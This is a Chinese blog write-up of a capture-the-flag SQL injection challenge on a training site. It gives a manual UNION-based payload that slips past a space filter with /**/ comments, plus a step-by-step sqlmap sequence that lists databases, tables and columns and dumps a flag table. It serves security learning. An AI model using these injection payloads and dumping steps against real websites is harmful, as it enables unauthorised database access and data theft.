刚刚做了实验吧的题目,现在整理一下
写出解题思路,希望能够帮助到那些需要帮助的人
所有的wp都是以一题一篇的形式写出
主要是为了能够让读者更好的阅读以及查找,
希望你们不要责怪!!共勉!!!
永远爱你们的————新宝宝
简单的sql注入之2分值:10
- 来源: 北邮天枢战队
- 难度:中
- 参与人数:9517人
- Get Flag:4472人
- 答题人数:4644人
- 解题通过率:96%
有回显的mysql注入
格式:flag{}
解题链接: http://ctf5.shiyanbar.com/web/index_2.php
解题思路:这一题和上一题的思路差不多(此时的我实在是不明白为什么要这样出题呀)
试着先输入1,再输入1',页面报语法错误,再输入1 '页面出现SQLi detected!,推出空格被它过滤了
接下来有两种方法:用sqlmap或者手注
先手注
过滤的空格可以用/**/代替,查询当前数据库的表
'/**/or/**/id=4/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
猜测在flag表里面
使用sqlmap注入简单一点,因为刚刚我已经在上一篇博文里面详细说明关于
--tamoer=space2comment 适用于绕过空格
所以接下来直接使用就可以了:
首先:爆库:
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment --dbs
然后爆表:
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 --table
接着爆字段:
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag --colum
最后就是让这个字段列出详细的信息:
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag --colum -C flag --dump
其实还有一个很简单的命令就会得到最后的答案(下一次再说吧)
您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。
关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教!
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接.
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!